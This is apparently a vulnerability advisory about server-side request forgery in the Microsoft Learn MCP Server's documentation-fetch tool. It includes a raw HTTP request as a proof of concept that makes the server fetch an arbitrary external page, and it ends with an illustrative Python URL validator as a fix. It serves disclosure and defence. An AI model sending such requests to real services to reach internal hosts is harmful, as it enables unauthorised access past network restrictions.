The Microsoft Learn MCP Server is a remote Model Context Protocol based server that enables clients like GitHub Copilot and other AI agents to bring trusted and up-to-date information directly from Microsoft's official documentation.
The Microsoft Learn MCP Server is available at https://learn.microsoft.com/api/mcp. It currently offers two tools to MCP clients, described as follows:
Microsoft Documentation MCP Server\r\n\r\nThis server gives structured access to official Microsoft and Azure documentation via two tools:\r\n\r\n## Tools\r\n\r\n### microsoft_docs_search\r\nSearch official documentation and return up to 10 concise, high-quality content chunks (max 500 tokens each), including title, URL, and excerpt.\r\n\r\n- Use first to get a quick, reliable overview\r\n- Ideal for grounding answers in Microsoft knowledge\r\n\r\n### microsoft_docs_fetch\r\nFetch and convert full Microsoft documentation pages to markdown.\r\n\r\n- Use after search when you need full content from a specific URL\r\n- Required for detailed tutorials, troubleshooting, prerequisites, or when search results are incomplete or outdated\r\n\r\n## Workflow\r\n\r\n1. Use \u0060microsoft_docs_search\u0060 to find relevant content \r\n2. If deeper or complete information is needed, use \u0060microsoft_docs_fetch\u0060\r\n\r\n**Search gives breadth. Fetch gives depth.**\r\n\r\nAll content comes from Microsoft Learn or official sources, returned in clean markdown format
The microsoft_docs_fetch tool is described as follows and allows an MCP client to request a specific documentation page from the microsoft.com domain:
{"name":"microsoft_docs_fetch","description":"Fetch and convert a Microsoft Learn documentation page to markdown format. This tool retrieves the latest complete content of Microsoft documentation pages including Azure, .NET, Microsoft 365, and other Microsoft technologies.\n\n## When to Use This Tool\n- When search results provide incomplete information or truncated content\n- When you need complete step-by-step procedures or tutorials\n- When you need troubleshooting sections, prerequisites, or detailed explanations\n- When search results reference a specific page that seems highly relevant\n- For comprehensive guides that require full context\n\n## Usage Pattern\nUse this tool AFTER microsoft_docs_search when you identify specific high-value pages that need complete content. The search tool gives you an overview; this tool gives you the complete picture.\n\n## URL Requirements\n- The URL must be a valid Microsoft documentation link from the microsoft.com domain.\n\n## Output Format\nThe output is formatted as markdown with preserved headings, code blocks, tables, and links converted to markdown format.\n","inputSchema":{"type":"object","properties":{"url":{"description":"URL of the Microsoft documentation page to read","type":"string"}},"required":["url"]}}
Due to a lack of validation in the MCP server tool, a remote and unauthenticated attacker can specify any host, leaving the server open to Server-Side Request Forgery.
Proof of Concept
The following request shows that the server connects to any URL and returns the response converted to markdown:
POST /api/mcp HTTP/1.1
Host: learn.microsoft.com
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36
Accept: application/json,text/event-stream
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 138
Connection: keep-alive

{"method":"tools/call","params":{
"name": "microsoft_docs_fetch",
"arguments": {"url": "https://google.com"}},"jsonrpc":"2.0","id":2}
And the response provided by the MCP server:
event: message
data: {"result":{"content":[{"type":"text","text":"**Search**[Images](https://www.google.com/imghp?hl=en\u0026tab=wi)[Maps](https://maps.google.com/maps?hl=en\u0026tab=wl)[Play](https://play.google.com/?hl=en\u0026tab=w8)[YouTube](https://www.youtube.com/?tab=w1)[News](https://news.google.com/?tab=wn)[Gmail](https://mail.google.com/mail/?tab=wm)[Drive](https://drive.google.com/?tab=wo)[More \u00BB](https://www.google.com/intl/en/about/products?tab=wh)\r\n\r\n[Web History](http://www.google.com/history/optout?hl=en) | [Settings](/preferences?hl=en) | [Sign in](https://accounts.google.com/ServiceLogin?hl=en\u0026passive=true\u0026continue=https://www.google.com/\u0026ec=GAZAAQ)\r\n\r\n| | | [Advanced search](/advanced_search?hl=en\u0026amp;authuser=0) |\r\n| --- | --- | --- |\r\n\r\n[Advertising](/intl/en/ads/)[Business Solutions](/services/)[About Google](/intl/en/about.html)\r\n\r\n\u00A9 2025 - [Privacy](/intl/en/policies/privacy/) - [Terms](/intl/en/policies/terms/)"}]},"id":2,"jsonrpc":"2.0"}
By leveraging this vulnerability, a remote and unauthenticated attacker could make the Microsoft Learn MCP Server perform arbitrary HTTP requests and bypass network restrictions in some circumstances.
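The check whose absence is described above could look like the following. This is an added example, not Microsoft's code and not part of the original advisory. It enforces the tool's documented "microsoft.com domain" requirement before any request is made. The function names, the DNS table and the addresses in it are constructed for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_DOMAIN = "microsoft.com"  # the tool's stated URL requirement
# Constructed DNS answers so the example runs offline (not real records).
CONSTRUCTED_DNS = {
    "learn.microsoft.com": ["20.0.0.1"],
    "intranet.microsoft.com": ["10.0.0.5"],  # hypothetical internal name
}

class UrlRejected(ValueError):
    """Raised when a URL must not be fetched by the tool."""

def constructed_resolver(host):
    return CONSTRUCTED_DNS.get(host, [])

def system_resolver(host):
    """Resolve with the OS resolver (what a deployment would use)."""
    infos = socket.getaddrinfo(host, 443, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})

def validate_fetch_url(url, resolver=system_resolver):
    """Return (host, addresses) when url may be fetched, else raise UrlRejected."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError as exc:
        raise UrlRejected("malformed URL") from exc
    if parts.scheme != "https":
        raise UrlRejected("scheme must be https")
    if parts.username is not None or parts.password is not None:
        raise UrlRejected("userinfo not allowed")
    if port not in (None, 443):
        raise UrlRejected("non-default port")
    host = (parts.hostname or "").rstrip(".").lower()
    if host != ALLOWED_DOMAIN and not host.endswith("." + ALLOWED_DOMAIN):
        raise UrlRejected("host outside " + ALLOWED_DOMAIN)
    addresses = resolver(host)
    if not addresses:
        raise UrlRejected("host does not resolve")
    for addr in addresses:
        if not ipaddress.ip_address(addr).is_global:
            raise UrlRejected("resolves to non-public address " + addr)
    # The caller must connect to one of these addresses rather than resolve
    # again, and must pass every redirect target through this function too.
    return host, addresses
```

With this check in place, the proof-of-concept URL https://google.com is rejected before the server opens any connection.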